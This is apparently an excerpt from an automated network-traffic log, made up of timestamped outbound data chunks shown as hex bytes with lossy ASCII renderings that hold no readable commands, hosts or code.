2023-09-01 11:40:10 UTC	49	OUT	Data Raw: 1e 72 a6 f6 b3 3d b9 90 01 c9 f3 23 51 c4 2e d3 09 d8 e8 cc 69 1c e4 ba 53 83 de 90 f7 23 04 e6 2b 16 5c 04 0e b1 8c 32 90 a8 50 04 12 57 12 4b c7 3f 8a 97 20 08 aa f0 d4 07 1d 85 10 04 e7 0d a7 56 44 55 1b ca 68 49 7e 58 98 17 56 ad dd 7e 1f 4c a2 d1 65 01 a8 87 d5 0f 68 cb 86 84 20 08 e8 55 83 58 6f 37 5a 4d 8a 56 0a 0f d9 2c fb d3 14 38 b9 c6 39 41 67 ff 61 a1 3e b7 7f 36 50 05 39 dc 8f bd 6f 8e 2d c3 13 5f e6 b5 74 8f 4b e4 b5 ee 04 e1 4f 02 9c f2 bf c2 55 32 83 ce 77 49 06 d3 7c 76 5e e1 ff 7d 0e a9 8d 66 78 ab 76 bc 08 cd 69 b7 d2 70 64 20 6c b4 0c e7 6a 7f 78 a8 81 0a 09 78 a0 78 19 71 39 48 38 4c 63 c6 06 54 63 29 e9 12 17 f9 6c 3a 2c cd 93 aa 9e 3d 95 d6 56 43 d4 51 6a 91 6d d4 74 85 e7 f5 0f e1 9c 10 f6 b3 93 b9 dc 0f 8e 60 d9 72 50 e5 fa e4 a0 Data Ascii: r=#Q.iS#+\2PWK? VDUhI~XV~Leh UXo7ZMV,89Aga>6P9o-_tKOU2wI\|v^}fxvipd ljxxxq9H8LcTc)l:,=VCQjmt`rP
2023-09-01 11:40:10 UTC	65	OUT	Data Raw: ab bd 70 34 e9 f5 72 fc a8 fa f7 8e d6 c7 7b d3 f5 15 df 6e ba 58 68 3d 9e eb 51 61 9e ca 52 f1 81 a0 e7 1f 83 4d a9 01 a4 e8 9f ee bb 1d 3b 6d 16 56 2d f9 43 9f 63 6c 20 18 eb 9d 0d 45 10 e3 fe 23 41 30 03 31 46 ec 9a 80 5f 8b 7d 07 db 91 ed 0b 27 ef 96 bd ca 05 bf 2b 81 ff 9d dd 6a 4e 5d 36 fb 6d 14 fe 55 f8 14 c0 65 45 8a 49 6f 3b 81 14 dd d6 83 61 e9 bd 8d bc d7 66 04 25 68 e1 4a f3 40 6f 4e b8 b4 69 e7 75 25 73 1d e5 76 78 d8 c7 99 f5 b2 69 13 a0 4e 41 9b 01 82 91 83 8c 20 8d 6c 25 e7 0d c9 94 eb 41 4b 58 5f af f0 ad 54 04 50 4a 86 a3 52 13 c7 4a b9 b5 c6 99 ed 12 e3 27 6f ea 89 02 32 0d 68 01 c5 0e 96 be b5 2a 6c 8d dd a3 1a 98 35 9b 9d c0 72 5c 60 18 b0 34 5a 62 fe e9 ea 49 e1 b9 01 59 44 c9 75 97 73 ad 7e 94 86 54 5e bd 61 fa 6e 4f 0e c5 4b 37 bc Data Ascii: p4r{nXh=QaRM;mV-Ccl E#A01F_}'+jN]6mUeEIo;af%hJ@oNiu%svxiNA l%AKX_TPJRJ'o2h*l5r\`4ZbIYDus~T^anOK7
2023-09-01 11:40:10 UTC	81	OUT	Data Raw: 02 93 71 f7 8b df 7b 72 11 d1 8d 6e a6 69 96 1f 82 fc c1 c8 23 52 68 25 b6 b9 43 79 5d 67 66 87 d1 95 d7 83 40 32 ef 21 58 8b e5 e0 69 20 8d f3 33 78 72 aa 3a 89 39 ce ea ad b8 cb 90 64 64 d1 1f ca 4d b6 16 b6 ed 96 58 ea f7 a5 1b 8f a1 94 3a e4 41 49 11 44 35 e8 b9 64 cf f7 9a 20 d4 0f c8 f1 03 c4 ac 90 2b 18 b5 43 cb 43 03 2c 7c 6c 08 af 68 e4 05 f6 1c d3 9d 41 a8 26 38 c7 f2 e4 c9 b6 ad 31 6e 3b cb da b2 62 a5 fb 25 2c e5 f1 90 18 de 94 0a 4d 09 5c ef 67 b2 78 49 d5 db 02 81 5e 84 36 d9 a6 e5 aa 9b 0f 3e 6c 31 32 66 78 fd fa 31 b7 45 98 99 fe bd 03 52 39 e9 ba 50 9f e0 e0 82 10 88 b2 05 41 68 7e 2f a3 40 57 00 90 5c f4 ad 1f ed 2a 94 0c 82 27 60 23 fa d1 d2 a9 74 83 68 31 c0 54 68 e4 38 5b d3 1e 70 57 27 de 9a c6 32 de 05 d2 cb 58 45 e8 89 4b 2f c2 46 Data Ascii: q{rni#Rh%Cy]gf@2!Xi 3xr:9ddMX:AID5d +CC,\|lhA&81n;b%,M\gxI^6>l12fx1ER9PAh~/@W\*'`#th1Th8[pW'2XEK/F
2023-09-01 11:40:10 UTC	97	OUT	Data Raw: f4 6d ba 25 94 2d bf 80 50 88 a4 86 51 d4 e1 c6 4a 4e 38 fe 97 df 28 cf a3 9b 85 b1 91 e8 1c d8 04 e6 83 39 f4 7d d1 2d fa f3 b5 cc d4 3f 5d b5 75 23 bc 8d 94 8e cc 93 74 a1 5d 68 f4 c1 b4 18 10 bc 30 f6 cf 65 27 10 54 8b ac a1 87 c7 a1 fb 10 e8 79 e8 13 bc 55 31 d2 58 67 9b da 2d ee 40 2b 8d a5 bf 4e 4b df 8d db 3d 23 da 76 61 c1 0b 58 07 e1 95 1e 27 3a 6f e2 6c ba 31 6e b6 84 c3 d2 be fe 74 a9 d4 8d 73 af b8 df 0f 0c d2 05 af 02 a2 04 f0 91 f2 5b da fa 85 fc 43 b7 bc 95 d7 bd 40 f4 9e 5b ee 65 4e b7 94 11 13 3e 52 f7 7c 1d 47 ad f8 97 e5 4a 4e 42 e6 bf e0 16 eb e1 a1 67 b0 97 d8 a3 bf 15 31 7b 27 83 92 8d de 74 5f f9 0f cf e5 e4 6f fe 83 c4 77 76 c9 ff ac 8c dd 8e ba 99 d7 15 46 62 0c 34 74 1c 53 f6 de b7 5d 42 7c 32 6f e5 c7 fc 71 b6 bc 7d 6e 92 c0 98 Data Ascii: m%-PQJN8(9}-?]u#t]h0e'TyU1Xg-@+NK=#vaX':ol1nts[C@[eN>R\|GJNBg1{'t_owvFb4tS]B\|2oq}n
2023-09-01 11:40:10 UTC	113	OUT	Data Raw: 10 05 e2 e6 36 5a e7 9c 74 46 fc d1 83 df ca cd 4c 62 b6 29 62 f3 a5 57 f4 6e f6 44 1e 43 db 29 24 f7 df f2 65 cd 24 86 1f 35 c1 5b 5d 2b d0 de 7b b1 57 65 f8 b9 9b f7 0b 5f fb f3 be cb 86 ca 84 f8 55 c1 e1 e9 44 a0 f3 08 96 16 ab e9 96 bc 3c 81 cf f3 bc d4 a9 d9 fa b0 6f 42 d9 dc 40 a9 f9 7a 49 d8 08 7a 71 8b f1 b2 1e 69 7c b0 4f 63 f4 f3 ab 9d 90 52 40 c7 4e 41 96 e2 4f 4e 03 e4 06 59 5b 8b ac c9 f2 0b 93 d9 17 26 8b 94 20 18 cf ab be c4 a1 fc 3f 72 1b 3e 27 3e c4 89 cc 1c c6 28 92 41 d6 8d 06 dc 94 e3 00 47 67 19 bd 15 41 3d cf f4 70 98 fa da e1 7d f0 d0 c4 12 2f 77 44 28 28 44 6f 54 30 80 1e b2 eb 75 28 6a dd fc 4a c5 93 97 3f e5 50 7b 8c 72 b7 b9 c0 bd e2 0a af 45 28 68 c4 23 52 24 d8 76 ae 6d f5 4d 4b 15 af fb 46 26 db 4e b1 1c f7 70 a1 d1 47 4e af Data Ascii: 6ZtFLb)bWnDC)$e$5[]+{We_UD<oB@zIzqi\|OcR@NAONY[& ?r>'>(AGgA=p}/wD((DoT0u(jJ?P{rE(h#R$vmMKF&NpGN
2023-09-01 11:40:10 UTC	129	OUT	Data Raw: 5b e9 49 6d 2e c6 6f c9 b5 fd d9 f6 61 f9 5a ad fc 58 a6 49 c3 cb bb 84 1a 5c 63 1f ef 77 e0 dd 34 e7 be 09 1a 6c ce fc 93 a1 69 b0 75 ff 6f ac 29 3f 37 27 bd 6a 4e 78 59 dc 03 7f 20 4f 0a f8 cb 1a 75 06 eb 1a 72 0e e1 47 04 7c 92 64 ec 14 34 2b 18 ff 87 ed b3 de 48 87 8f c1 95 78 71 b0 fb 32 fc 70 86 f3 6d fc df 41 86 82 71 48 52 bb 19 f6 c4 3e 3e 5d 99 2a 57 8f 0c b7 b1 4b 82 f5 f6 28 01 91 de ef 27 cb 73 0e ab dd 9d dc b0 cd 1f 64 92 b3 32 5b f2 5e b8 d9 96 83 bd 20 ba e4 ba b4 c1 3b e1 26 ed 54 1b b0 d6 9f 5c bf 75 c0 6f e4 b9 c1 7e aa 25 bd 9a 2a 87 e0 d7 69 06 bc 37 71 d5 ff 1e 98 31 ff eb 3f 68 13 f9 71 6a 68 99 71 8d e9 eb 5b af 82 aa 12 a4 29 38 1c 34 3c 89 e6 27 79 e1 79 c2 ee d9 3c 6c 56 44 16 a1 8b d6 50 87 ba c3 9c 68 70 03 96 ae 11 b4 07 ed Data Ascii: [Im.oaZXI\cw4liuo)?7'jNxY OurG\|d4+Hxq2pmAqHR>>]WK('sd2[^ ;&T\uo~%i7q1?hqjhq[)84<'yy<lVDPhp
2023-09-01 11:40:10 UTC	145	OUT	Data Raw: 37 3f 5d 7e cb 33 15 b5 9f a9 b8 ed e9 8a 46 cf 27 1a 3e 97 68 f4 6c 02 7e 7e 83 a7 13 f5 9e ac ac fb 44 c5 2d 4f 56 7e ef f1 ca ef 3c 5a fe ef 67 4a bf 7d a2 f8 9f 8e 5c fe c6 81 4b 37 ee fd 38 56 78 2e b2 e7 82 51 f0 91 b1 ed 23 33 f7 fd e8 ea f7 a2 8b de b6 66 fe c9 b8 ef 37 62 dc 2b e2 8e 67 8d 91 4f 5a 39 8f 46 73 1e 8e 0e 3b 6b e2 87 f0 51 4c 0b 1a 82 8d fa 70 5a 67 bf 5d 46 da 16 2b 35 37 06 ff e9 57 53 80 bf 3f 37 f5 b6 82 5e 80 72 e0 db 0a 70 cf 8b 9d ea a2 fd 12 1f ac 5c c4 46 d7 63 c5 f9 7a 33 3e 92 cc fc c8 d9 f6 63 7f 75 a4 1d 04 ae 78 63 3d b9 ee 4d f1 67 91 72 e0 b9 9b e8 e6 8f d5 ce 43 eb 1b 7e 29 c0 d5 e6 aa 04 58 45 7a 75 fb bd 1a 01 46 ad ad f7 59 12 e0 e4 f6 5b 43 01 4e ae be 86 3e 68 c7 df 19 4b af 20 0d 24 58 80 b5 41 4a 61 4d 95 ae Data Ascii: 7?]~3F'>hl~~D-OV~<ZgJ}\K78Vx.Q#3f7b+gOZ9Fs;kQLpZg]F+57WS?7^rp\Fcz3>cuxc=MgrC~)XEzuFY[CN>hK $XAJaM
2023-09-01 11:40:10 UTC	161	OUT	Data Raw: 0b 98 ab c1 61 a2 b0 4c a1 59 e2 48 b0 b8 22 18 b7 04 1b 75 60 96 83 25 2a ae 1d 63 1f d2 3f 4b 50 5f dc 0f 6c a7 2c f3 c0 1c f2 46 c9 21 d2 7a 8c 56 d8 34 69 21 31 4b 3c 4d 3b 84 4d 0b 84 7b 59 d6 26 c9 d8 0b cd 72 a1 61 43 92 68 c2 ef 0d 92 ca 0f d1 96 df 0e 35 6a c2 4c 7a 49 05 7e 5a 90 b0 08 2c 80 d1 c7 da 86 e1 91 b8 e1 d6 48 90 c6 35 3f 6c 9d 12 2e fb e1 b9 50 c2 1a 5b 6d d5 f0 14 63 4e 58 33 37 51 d8 50 83 e5 1a 71 40 75 b0 32 b9 d6 22 a9 76 3c 00 9d d2 1a 75 96 68 e5 44 4d a5 1a 26 f2 12 22 2c ce d9 a4 55 54 f4 89 e2 74 28 c2 b4 d1 c2 60 98 ea 18 05 0d 28 1a 1f 24 5d b3 94 6e 47 94 1e 47 5d d1 c7 dc 3d 8f 43 79 27 fa b4 bb 27 0b d9 ea 73 de db f7 42 44 ff f3 40 bf 8b 28 c6 5e 7a 3d e0 02 25 72 e0 45 4a 44 ff b3 51 fd cf 50 22 fb e5 50 3c fd 4e 62 Data Ascii: aLYH"u`%*c?KP_l,F!zV4i!1K<M;M{Y&raCh5jLzI~Z,H5?l.P[mcNX37QPq@u2"v<uhDM&",UTt(`($]nGG]=Cy''sBD@(^z=%rEJDQP"P<Nb
2023-09-01 11:40:10 UTC	177	OUT	Data Raw: 48 ab f7 93 da 1e a1 1a 3f 94 2e 33 d6 2d e9 22 c5 9d a4 b4 5b 2f ed d1 4b fd 40 bc 45 3d 4c 7a a1 9f c9 28 0a 78 0b 03 d8 f0 42 0a 82 a4 28 c4 a4 15 87 f5 92 88 14 bb 89 52 77 42 25 33 da a4 12 80 cb 10 6e 53 6c 55 a9 e2 90 90 44 62 84 de a2 08 f0 27 6a 40 00 0c 3f 17 33 9f 61 c5 c0 aa f4 00 2c 7e 4a ea f3 61 3b 8b 4d fa 1d 08 00 cb b9 c1 b8 61 31 30 75 4a d8 bf 7c 0c 52 43 04 1a a7 1b 62 a4 3e ae 55 c5 8c 8a 28 fb 2f ef e8 ba f6 ff 79 39 34 b9 9b fe e5 1f d1 b3 f2 5e f5 de f2 34 f9 f3 cb 44 cc fb 55 06 20 69 a6 90 5d 25 12 6b 67 fc 90 29 ad 33 9c 8e 90 d5 79 c2 e6 7d f0 a1 dc f4 e3 43 55 ff 08 6d ce f8 35 27 fd 7e 2c da 14 7b 7e 26 51 53 ff ea ff a2 f8 4d 0b 74 f5 af fe dc 89 bb 03 ef 07 fe 24 90 ec e2 fd e2 b8 23 73 ee 11 94 3d ff 2f 13 f9 9a 25 dc c3 Data Ascii: H?.3-"[/K@E=Lz(xB(RwB%3nSlUDb'j@?3a,~Ja;Ma10uJ\|RCb>U(/y94^4DU i]%kg)3y}CUm5'~,{~&QSMt$#s=/%
2023-09-01 11:40:10 UTC	193	OUT	Data Raw: bf 25 c0 cc 1e 48 07 34 63 0e c7 04 42 a5 b8 5c 11 e5 06 5b 04 a8 4a 4e e8 16 33 3b e0 b3 de f0 4f 56 f0 0e d0 e1 87 e4 04 28 46 52 2a 16 b0 0d 0e 38 35 bc f5 8b 32 66 3b 01 67 92 82 13 bd 1e 0c a6 00 82 0b 93 eb 75 ae dc 2f c5 03 b6 ff 16 7f 47 10 3e 3a 02 a0 e6 da 0d 16 29 93 ca 22 8f ab 77 04 bf f9 d7 bb 37 f0 9f 30 7b 9b 39 de fd 14 28 b8 b2 7e 8b b3 1b 6b f0 a1 03 ea 81 03 47 7e a6 82 21 01 12 27 af 69 6b ed a8 b3 d1 37 8c d9 5a 21 0d da dd d6 f0 ff 7e 28 fc d9 cc 8d df 28 32 11 36 ff 2e 9f fd ae 89 d1 5a 4b 23 e3 4b 6a 07 0d bb 4a 02 8b aa 42 18 ef 49 e0 76 d0 9b 73 a6 84 a8 70 50 a4 59 d7 5a 5e 33 f3 2f 1e e2 92 8a 57 ab fa 10 93 f7 e6 2f 5e 94 c4 fc 77 d7 5e 42 72 d7 f7 bb 99 31 a6 29 81 e0 7d 22 cd d5 2b f1 3d 7d 11 67 30 ed 23 9a b8 3d 13 6d 55 Data Ascii: %H4cB\[JN3;OV(FR*852f;gu/G>:)"w70{9(~kG~!'ik7Z!~((26.ZK#KjJBIvspPYZ^3/W/^w^Br1)}"+=}g0#=mU
2023-09-01 11:40:10 UTC	209	OUT	Data Raw: a3 e4 3f ff e2 02 1c c0 7e 3b e1 17 14 e0 ff e9 16 e8 73 11 e0 40 0e dc 0d 01 56 1c f8 bf ba 05 fa 9d ff 8d 16 e8 ae 0b b0 5e 7d cf 9b 00 2b 0e 9c 1e 40 80 1f 0b 52 07 d6 1a a1 f5 0e fc 34 75 60 a8 03 7b 04 58 2b 05 eb 05 38 80 03 97 70 f3 14 ef d5 17 84 19 9d 03 7b 25 45 2b ea 5b 4e a8 a2 0e 4c da a1 6b a8 00 6b d1 d0 81 05 58 97 0b 1d b0 14 ac cc 00 fb c1 be 71 08 13 68 45 f0 d7 0a 58 80 df f2 38 30 f3 ce b7 80 bf 06 eb 05 d8 4b 83 8f 29 f8 0f 06 07 14 60 7f 13 fe a0 b3 35 c2 fe 1a 1c 70 7f 92 46 67 02 0c 0e ec 29 02 fb 0a b0 06 79 ab a4 77 60 36 de ad 38 70 22 d6 60 49 73 60 45 7d a9 fd 6a e0 9b ea e6 24 2d 34 cb b7 53 7a b5 e8 49 99 f6 4c 17 8b 14 fc 59 9a 0c ab 0a 0d 27 d4 8d 75 27 ed a6 26 e3 c4 b2 a2 c1 0a 7e db 71 3c 48 6c ba c0 64 b8 99 0c 41 87 Data Ascii: ?~;s@V^}+@R4u`{X+8p{%E+[NLkkXqhEX80K)`5pFg)yw`68p"`Is`E}j$-4SzILY'u'&~q<HldA
2023-09-01 11:40:10 UTC	225	OUT	Data Raw: 56 11 80 7d f5 de a6 c1 68 1f 64 bb 35 af 90 71 e1 60 09 1c 22 b9 d2 23 0a ec 61 4e 76 a8 82 c4 3c 9f 86 36 34 fd 4d b7 89 32 06 8d de c0 e5 c9 ef 68 9d 09 e1 2f 53 00 76 0b b9 50 23 b6 8f 3a 30 a3 a0 83 5c 79 02 4d d0 c3 9a e1 13 9f 6a 1b 37 c5 97 e0 17 b7 01 4a 57 31 c8 47 a0 25 6e c2 3c 62 44 8a e2 20 45 2c 56 08 4a 51 7a 16 5d 2c 08 75 3a 40 a2 ef d1 39 0f 04 77 e6 49 ec fe 81 b2 f6 7a 7a ad 08 d0 59 c1 7e b2 10 00 6c 1e f2 dd 51 f3 8f 22 67 c0 3a 20 b0 78 05 df 10 50 e9 d9 b7 4e 8f 40 2c 63 0a f5 c1 0b 37 90 9a 24 99 bb 5b d7 ee 8c c7 22 5b 28 c9 53 66 2c 76 e9 02 3d e5 73 8c 13 24 8e 3e 04 dd 59 6d a1 1e a0 0f 47 fc 3f e0 53 16 20 b1 64 8d 0e 61 29 3a 4d db bd 18 80 17 e5 22 93 94 05 d4 a1 45 a1 db 38 60 db 60 95 66 69 59 93 c1 e7 e0 5e 00 29 66 d4 Data Ascii: V}hd5q`"#aNv<64M2h/SvP#:0\yMj7JW1G%n<bD E,VJQz],u:@9wIzzY~lQ"g: xPN@,c7$["[(Sf,v=s$>YmG?S da):M"E8``fiY^)f
2023-09-01 11:40:10 UTC	241	OUT	Data Raw: 36 1b 6c 9b 78 b0 2e d8 08 ac 4b 7b 28 88 6e 6f 99 fa fa 21 83 c2 ca 2a 27 d8 2b c7 59 a3 23 b8 32 3c c3 f9 98 af f6 86 c2 a8 5d b5 fc df ba 9e 66 d6 9f ba 1f a8 f6 9f 1b ef 8d 96 0c 9d bd 9d 6b fd bd 66 5e b6 ee fd f3 8e 09 f0 57 09 b8 1d 4c ef 26 ef 58 4d 19 fa c6 89 ee f3 dc 9b 55 dc 28 63 e3 cd cf 50 b5 33 d5 e6 ad a3 d6 c7 34 a7 15 52 b5 fe a1 3c ff 6b 2b c4 a2 b9 87 f8 bd 2d 6f 72 84 ef de ab 7e c7 31 d7 6c 17 f2 1f 55 32 1d d1 1a 1f 64 fb 32 c7 13 d8 ea 91 a0 76 7d f6 bd c7 cc a9 2b 40 ab da ee aa 70 c0 2a d2 d7 75 77 e1 bb d1 68 50 32 65 6b a0 cf 4e 65 a4 64 d1 fa 8f ff 87 c9 a0 07 61 bf 0b be 86 37 e1 80 0b a1 9a f7 b9 aa 7b 47 d6 c6 4e e6 c1 41 e6 b2 3f c7 e4 a5 59 c4 e1 21 0b 1f d5 3d 9f 45 67 c2 9e 74 06 3e 0e bb c2 55 26 31 c0 cd 46 7f 62 06 Data Ascii: 6lx.K{(no!'+Y#2<]fkf^WL&XMU(cP34R<k+-or~1lU2d2v}+@puwhP2ekNeda7{GNA?Y!=Egt>U&1Fb
2023-09-01 11:40:10 UTC	257	OUT	Data Raw: 9b b1 b1 b2 7f 48 90 12 fe 09 11 74 2e 91 70 98 3e be f5 e8 c9 b8 76 c6 e1 d9 f2 07 84 96 4b 57 f4 9f 5a 83 71 5b b2 de 96 e8 d3 7f 39 ae b0 42 f8 18 4d 88 3f 14 1c 5a 1f ff e3 e9 4d 8a 91 09 30 fa 35 d2 1c 37 6e f8 a1 71 f0 7c f8 c1 5f 7b 80 f9 6a 27 81 18 47 e4 ef c6 a9 4c 8c 23 ac 7e 91 93 a4 84 fd 35 35 c1 97 33 af c2 83 00 64 1f ce 84 78 ca bf 3b ba 31 54 71 20 f9 3f 70 2a 5d 9e d7 01 e8 c8 04 6a ef ab 2f 95 3b d3 80 e6 f0 19 69 00 c1 18 50 05 91 fa 2b a1 7a 26 04 41 c9 2f ab a2 ef 20 0f 77 8a 21 c0 86 59 02 3e da 01 87 05 92 c9 4a 08 76 22 19 40 d8 6b d3 d3 e8 5c 66 ea d7 4d e6 90 92 14 c0 91 81 d6 9b 28 d9 dc 11 aa a9 d0 7a b2 22 f5 ac f9 ed ee 41 8e 70 ee 36 7e e5 aa 8f 62 25 ea 24 09 a2 71 28 f3 ee 43 f0 e7 e5 bf 9f 8d e0 55 a4 64 fb ea fe 82 5f Data Ascii: Ht.p>vKWZq[9BM?ZM057nq\|_{j'GL#~553dx;1Tq ?p*]j/;iP+z&A/ w!Y>Jv"@k\fM(z"Ap6~b%$q(CUd_
2023-09-01 11:40:10 UTC	273	OUT	Data Raw: 1d 4e 38 3f d5 a3 45 27 68 51 df 37 eb c9 aa a5 59 07 05 22 36 57 58 6f 9e cc fe 99 d6 4f 15 35 f0 3f 55 a6 15 44 39 fa 93 25 13 ea 0a 8a f3 3b c3 1d 7c f4 72 95 ed 06 93 d3 d8 b3 52 ed bd fe 74 c3 12 7b 13 e7 a2 5a 53 0c 42 9a 7c 2c b9 b8 f5 ac 00 79 f6 cb 59 c3 48 57 2e 6e 4f b4 24 b6 9a d3 0d 7a fc ba 65 81 e5 e6 b0 fc 5d 2d da 47 c6 7f 1b d7 68 de fc e4 f9 8d d1 f9 6d e9 60 bd 24 5d e1 d4 73 e1 5a 37 84 ff e2 48 6f 44 c7 ee ef ae b8 dd 5f 7f 43 fc 3e e8 36 42 35 4e e7 3f 2b 6a 72 c4 78 43 2d 87 98 de 71 b1 fc d4 d8 42 5d cc a7 a4 8b 36 3f ff c6 8c f4 3b 0d 80 59 6f 83 be 85 68 36 2c ed 54 8f 2f 59 33 ac 3f 97 1e b2 73 5e 6a 17 de 7f 29 04 3a 66 50 ec 57 e0 49 c3 d9 53 c8 73 b4 23 9d bf 0a 45 e4 de 54 8e a1 28 e4 bd 93 02 e7 ac e7 b6 37 c5 57 87 95 1a Data Ascii: N8?E'hQ7Y"6WXoO5?UD9%;\|rRt{ZSB\|,yYHW.nO$ze]-Ghm`$]sZ7HoD_C>6B5N?+jrxC-qB]6?;Yoh6,T/Y3?s^j):fPWISs#ET(7W
2023-09-01 11:40:10 UTC	289	OUT	Data Raw: 6d 64 93 32 e8 d3 47 b2 02 d0 f3 64 f0 1b d9 96 7f 74 0b 22 29 38 5a c4 75 a4 3b 74 2a 3d bc fc e9 f9 83 2c 9b fd 00 8e f1 23 04 3f 61 db 97 aa 6e a0 e5 04 7c d2 b8 4a 01 9c 99 1c 95 06 a1 33 1a a1 80 da d7 27 68 6e b5 81 a1 94 0c 0d ec b7 a3 2b c3 e3 81 17 67 6f 37 12 28 0c 8b 6e 7f e3 43 6a 66 5a a1 b8 17 23 b6 80 e2 45 aa 62 9b 63 22 bd 80 88 63 ae 4e 05 b8 7c d7 98 6e bb 6b 26 d4 89 a7 87 ef 45 f6 cb 4f dd c8 c0 59 da e1 70 c0 16 97 08 bc 54 28 82 4e a4 e0 d1 62 91 da 9e 1d 8e 90 c2 4a 67 06 42 5d b9 f7 76 a1 96 45 7e 94 42 e7 d3 c8 c9 f3 38 69 d0 51 06 55 46 06 4f 27 91 1b dd cf 94 ee e6 70 23 13 d1 0e e4 a6 8a 69 f7 ef 0d f8 36 34 ce 32 25 bc be fb 47 da 81 a9 c7 ba 66 33 86 d2 c3 05 15 94 ef 5f f2 de 48 47 e1 16 28 0f 40 81 ff c5 4b 05 97 fc 98 c3 Data Ascii: md2Gdt")8Zu;t*=,#?an\|J3'hn+go7(nCjfZ#Ebc"cN\|nk&EOYpT(NbJgB]vE~B8iQUFO'p#i642%Gf3_HG(@K
2023-09-01 11:40:10 UTC	305	OUT	Data Raw: b0 dc 02 7b 12 68 50 da fe b8 26 65 9d 7c 09 55 87 2d 39 6e 84 ec 69 c9 29 52 44 b2 4a 86 88 34 27 e5 b0 74 6a 7b 45 a0 ab 84 15 6e 62 3b bc d0 34 55 94 1a 2c 88 15 ab 5e 0c 66 1c af 92 e2 b7 e2 d5 49 66 36 65 19 7f 78 99 35 24 7f 52 74 4a 05 41 eb 1f 3a b9 50 e1 15 4c 44 16 8b b2 fe dc cd ce ba a7 42 ba ad 22 39 91 e2 4f 6a 51 ae 63 5f 4f ac 40 35 e5 85 9a 3b 38 75 62 db 1a 61 5d 4b 88 f4 04 4a 1e a1 63 cd 32 7d 9d eb 9c bc 98 c4 af c0 52 a2 49 34 b5 13 46 79 61 97 f2 12 7e 98 32 13 c1 91 78 a8 8f bc 50 db 4e 31 e5 eb 9d 29 0f 96 d9 db a1 6c 9e aa 79 7b 74 e0 44 e8 75 04 eb bc 98 a1 13 9f 67 fd 75 d6 ab 2f ea 72 5d 31 5c 52 d7 d2 78 e1 17 2b 1e d5 79 b1 84 86 71 2e f9 92 f0 aa fb dd d7 c7 6e 10 01 45 2f d4 54 fe fa 93 f1 0d bf 42 e2 02 85 56 28 d5 58 48 Data Ascii: {hP&e\|U-9ni)RDJ4'tj{Enb;4U,^fIf6ex5$RtJA:PLDB"9OjQc_O@5;8uba]KJc2}RI4Fya~2xPN1)ly{tDugu/r]1\Rx+yq.nE/TBV(XH
2023-09-01 11:40:10 UTC	321	OUT	Data Raw: 07 1f 38 49 12 83 12 49 70 22 7e 84 e1 cf ab ee 25 df 74 40 f4 49 13 bc 93 e9 e4 b6 04 93 57 82 c9 33 5e f4 8c 13 3c 96 22 ee 71 a2 47 3c e2 19 87 b8 2f 15 3a 2f 22 20 c0 9d e6 a1 03 bb cd 15 3b cc 06 a4 76 b3 84 f6 b3 20 22 ed 67 00 b2 ca 4e 63 60 43 be 8e 58 16 05 97 69 0c ed b3 12 6d e9 17 59 93 bf 73 8c d4 26 06 a2 86 49 ca 5c 00 a6 c4 fc c3 af 76 93 c4 f6 93 35 b9 59 aa b8 ed 26 52 b9 9d 88 85 21 78 ad 30 81 5d c0 ab 14 e8 4b 26 51 a1 9d 8c 9f 9d b9 51 3a 4c 51 69 4f 0b 4c 78 8d c9 44 1e db 4e 94 23 55 5f 1e c7 a9 29 5f d7 d1 18 db 46 13 d7 b1 2a d4 57 e9 2e 77 8e 2c c0 f4 da 2a 4a d4 69 75 9d 23 d4 6f 89 96 d6 ea 9c 05 d2 62 84 9e 61 08 98 6a 2b d9 84 e5 5c 31 cf 18 63 0a 7a 24 8b 62 eb 28 b1 35 8b 51 f8 55 5a 8e 51 3f bb 6c 39 56 6a 39 46 6a 1e 6d Data Ascii: 8IIp"~%t@IW3^<"qG</:/" ;v "gNc`CXimYs&I\v5Y&R!x0]K&QQ:LQiOLxDN#U_)_FW.w,Jiu#obaj+\1cz$b(5QUZQ?l9Vj9Fjm
2023-09-01 11:40:10 UTC	337	OUT	Data Raw: e0 45 27 65 c8 25 c7 e0 8b f6 c1 44 86 41 89 69 ae 78 e4 65 27 96 e1 2b c4 84 35 19 86 88 7d 38 c1 0e 4c 48 20 32 8c 35 d8 01 26 0c 0e 3c 35 b1 68 e6 55 27 38 f0 9c ab 2e 9c 0a 4e 66 2c 00 01 4e 61 8a cb 2d d7 e4 c0 a6 b7 56 a4 02 8e 95 69 4e 0a 78 ef ea 34 d7 97 37 dd eb 32 d0 ba 0c 37 e3 a6 0b 58 9f ee de 90 e1 09 d1 00 ef 05 36 67 b8 b7 67 a2 1d 59 98 9d 59 6e 60 77 96 0b d8 73 db bd ef b6 13 e2 ae 4c f7 de 4c cf 81 5b ae c3 59 ae a3 59 ce 23 b7 9d 07 6e 3b 76 67 3b 43 b2 9c 8b 52 72 d7 dc 45 ed b7 27 bc da 7e be d2 08 fe 75 62 36 9e 6b c8 86 c4 6a 43 83 09 e5 c4 25 43 b8 d7 94 c2 16 ba 94 13 07 0e 0b e9 df d5 2c fd 7b 67 39 8e f7 43 be 89 ee 41 db 80 a9 00 e7 5c 19 90 9b c0 06 41 8b 02 ec 4c a5 02 3c 81 08 f0 14 ff eb 52 e8 59 fd 53 10 60 fb 73 35 40 Data Ascii: E'e%DAixe'+5}8LH 25&<5hU'8.Nf,Na-ViNx4727X6ggYYn`wsLL[YY#n;vg;CRrE'~ub6kjC%C,{g9CA\AL<RYS`s5@
2023-09-01 11:40:10 UTC	353	OUT	Data Raw: 9d be 77 03 a4 e1 c9 ab be 08 7e 29 cb 2a 09 22 a2 5d 22 b2 8e b4 b6 96 d0 86 cf ee 0d a1 03 fc 65 af de bc c0 fe 0d 62 b1 90 93 24 fe 65 42 d9 1f 8f 78 76 26 1a be 62 62 6c cc 2e 4a 9f 9f 05 f1 dc bc c1 64 b1 dc 40 d3 23 23 95 96 fc 26 c1 40 e1 ed 15 93 ab 75 f2 a3 94 0f d7 d2 35 43 54 7f fc 74 d5 0d d9 a3 34 3d 68 d0 28 2b 43 5b 8c b5 77 7d 30 9d 3a 87 fb d1 8c da fb a3 50 78 6c 38 f2 11 90 e7 70 45 64 a1 e7 1b c2 56 c3 38 8c 25 77 f9 45 84 c7 74 6d a5 66 86 64 6e 7f bb fe 36 2e 0c f7 ef 1c 10 87 af f4 ff 3e fd 82 17 d9 94 53 14 78 0a cd 7b ff 08 28 32 d7 a3 b3 55 5b ba e9 01 df f2 e7 d2 2f 7a a2 bf f8 64 07 ff fe a5 55 1d bb dd d7 eb e7 ef 3a 4c f0 88 b9 48 13 0b ed f5 47 2e 4a 33 5a f1 bb 47 7d f3 b8 57 1e c6 a8 60 30 c2 2d 74 66 78 aa 6a 08 04 3a 46 Data Ascii: 